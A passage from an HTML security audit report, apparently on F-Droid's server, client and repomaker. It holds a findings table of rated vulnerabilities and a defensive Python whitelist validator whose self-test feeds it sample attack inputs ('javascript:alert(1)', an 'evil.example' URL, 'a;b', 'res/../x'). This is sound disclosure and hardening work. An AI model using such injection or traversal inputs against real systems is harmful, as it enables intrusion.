</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response" style="color: #e2632a;">OTF-008</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>html/JavaScript Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>BluetoothServer.java: Request URI Included in Response
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage" style="color: #e2632a;">OTF-009</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified trust</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application uses TrustOnFirstUse (TOFU), potentially trusting an unverified signing certificate.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites" style="color: #e2632a;">OTF-010</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The request to http://[client IP]:8888/request-swap is vulnerable because any user can send it to the client's device. This can be used to show malicious messages and to redirect users.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelModerate"></a><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py" style="color: #e2632a;">OTF-011</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Sanity checks in fdroidserver lint are easily evaded and allow injection of javascript code in descriptions of apps.</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver" style="color: #e2632a;">OTF-012</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>By submitting an app to fdroid with a crafted appid it is possible to deny the publishing of new apps to fdroid.</div></td><td style="margin-left: 0; 
margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py" style="color: #e2632a;">OTF-013</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Maliciously crafted images can lead to resource exhaustion in fdroidserver.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py" style="color: #e2632a;">OTF-014</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Insecure usage of temporary files can allow an attacker to cause a denial of service by linking to an important file and having it overwritten.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver" style="color: #e2632a;">OTF-015</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>XML file parsing can be used to exhaust resources (RAM) when entity parsing is abused for the Billion Laughs and Quadratic Blowup attacks. There are a couple of places in fdroidserver where this can happen.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified" style="color: #e2632a;">OTF-016</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file download</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> Download File Type and Size Are Not Verified </div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection" style="color: #e2632a;">OTF-017</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothClient.java
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection" style="color: #e2632a;">OTF-018</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothServer.java
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f35-potential-sql-injection" style="color: #e2632a;">OTF-019</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Concatenation of strings, some of which are under attacker control, is used to form DB queries.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard" style="color: #e2632a;">OTF-020</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>URI redirect</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The app uses data from the clipboard as an external resource link.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f43-file-deleted-unconditionally" style="color: #e2632a;">OTF-021</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>File deletion</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The application deletes the specified file unconditionally if it exists.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended" style="color: #e2632a;">OTF-022</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure temp file</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
nanohttpd.java uses insecure temp files
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-023</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application was found to be signed with SHA1withRSA, which is known to have collision issues.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions" style="color: #e2632a;">OTF-024</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The app builds and executes raw SQL queries. Untrusted user input in raw SQL queries can lead to SQL injection attacks.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-" style="color: #e2632a;">OTF-025</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application's Nearby Swap feature allows a third party to snoop on the communication and download files from either user's device without their permission.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl" style="color: #e2632a;">OTF-026</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Transport Layer Security</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Trusting all certificates or accepting self-signed certificates is a critical security hole. This application is vulnerable to MITM attacks.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-027</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SHA1withRSA, which is known to have collision issues, has been used to sign the application package.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelLow"></a><div><a href="#f1-tabnabbing-in-repomaker" style="color: #e2632a;">OTF-028</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Tabnabbing</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious target site opened from repomaker can manipulate the page that opened it. </div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches" style="color: #e2632a;">OTF-029</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious File Upload</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insufficient checking of file types can lead to upload of malicious code.</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr 
style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input" style="color: #e2632a;">OTF-030</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unsafe use of the DatalistTextInput can lead to JavaScript injection in Repomaker. This widget is currently only used to select from a predefined list of languages; however, if in the future it is used to render unsanitized user input, it can be easily exploited.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py" style="color: #e2632a;">OTF-031</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Dangerous Function</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The dangerous Python module pickle is used to store and load a cache. On its own this is not exploitable, but when an attacker can write files, this can be escalated into a code execution vulnerability.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path" style="color: #e2632a;">OTF-032</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Execution without path</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
All external programs called by fdroidserver depend on the correct executable being found first in the $PATH environment variable. If an attacker is able to place their own executable on a path before the legitimate executable, that can lead to adversarial code execution.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py" style="color: #e2632a;">OTF-033</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Maliciously crafted appids can be used for code injection. However, in this case the code injection happens in the build VM, where other attacker-controlled code is executed willingly.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check" style="color: #e2632a;">OTF-034</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file in response</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
BluetoothServer.java: File Included in Response Without Size or Type Check
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys" style="color: #e2632a;">OTF-035</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Hardcoded keys</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
No Mechanism to Remove hardcoded Root CA Keys
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding" style="color: #e2632a;">OTF-036</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak data protection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Use of ROT13 and Base64 Encoding
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f38-untrusted-external-links" style="color: #e2632a;">OTF-037</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified remote resources</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
External links used without validation
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended" style="color: #e2632a;">OTF-038</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak regular expression</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Regular expression used for filtering file name entries in zipsigner appears to be permissive.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr></tbody></table></div>
</div>
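<div style="color: #444444; font-family: Helvetica; font-size: 11pt; margin-bottom: 5pt;">Findings OTF-004, OTF-007 and OTF-038 in this summary come down to one defensive pattern: validate untrusted input against a whitelist of what is allowed instead of rejecting known-bad characters. The Python example below is added here for illustration and is not code from fdroidserver, repomaker or zipsigner. It shows the pattern for the two inputs in question, URL schemes and zip entry names; the entry-name pattern <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">SAFE_ENTRY_NAME</span> is an assumed one, not zipsigner's actual regular expression.</div>

```python
import re
from urllib.parse import urlsplit

# Whitelist of URL schemes, following the OTF-004 / OTF-007 recommendations.
# Anything not listed (javascript:, file:, data:, schemes not yet thought of)
# is rejected, which a blacklist of known-bad schemes cannot guarantee.
ALLOWED_SCHEMES = frozenset({"http", "https"})

# Assumed whitelist for zip entry names (not zipsigner's own pattern):
# path segments of letters, digits, dot, underscore and dash, joined by "/".
# Semicolons, pipes, quotes, spaces and so on simply cannot match.
SAFE_ENTRY_NAME = re.compile(r"^[A-Za-z0-9_.-]+(?:/[A-Za-z0-9_.-]+)*$")


def is_allowed_url(url: str) -> bool:
    """Accept only absolute http(s) URLs that name a host."""
    if not isinstance(url, str):
        return False
    parts = urlsplit(url.strip())
    # urlsplit lowercases the scheme, so "JavaScript:" is caught as well.
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    # "http:relative" or "//host" has no usable scheme+host pair.
    if not parts.netloc:
        return False
    return True


def is_safe_entry_name(name: str) -> bool:
    """Accept a zip entry name only if every segment matches the whitelist
    and no segment is a traversal component."""
    if not isinstance(name, str) or not name:
        return False
    if SAFE_ENTRY_NAME.fullmatch(name) is None:
        return False
    # "." and ".." match the character class, so reject them explicitly.
    return all(segment not in (".", "..") for segment in name.split("/"))


if __name__ == "__main__":
    for candidate in ("https://example.org/app", "javascript:alert(1)", "//evil.example/x"):
        print(candidate, "->", is_allowed_url(candidate))
    for candidate in ("META-INF/MANIFEST.MF", "a;b", "res/../x"):
        print(candidate, "->", is_safe_entry_name(candidate))
```

<div style="color: #444444; font-family: Helvetica; font-size: 11pt; margin-bottom: 5pt;">Both checks return a plain boolean so they can be dropped in front of the existing parsing code; the caller decides whether a rejected value is logged, skipped or reported as an error.</div>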
<a name="recommendationSummary"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.7</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">Summary of Recommendations</div></td></tr></table></div>
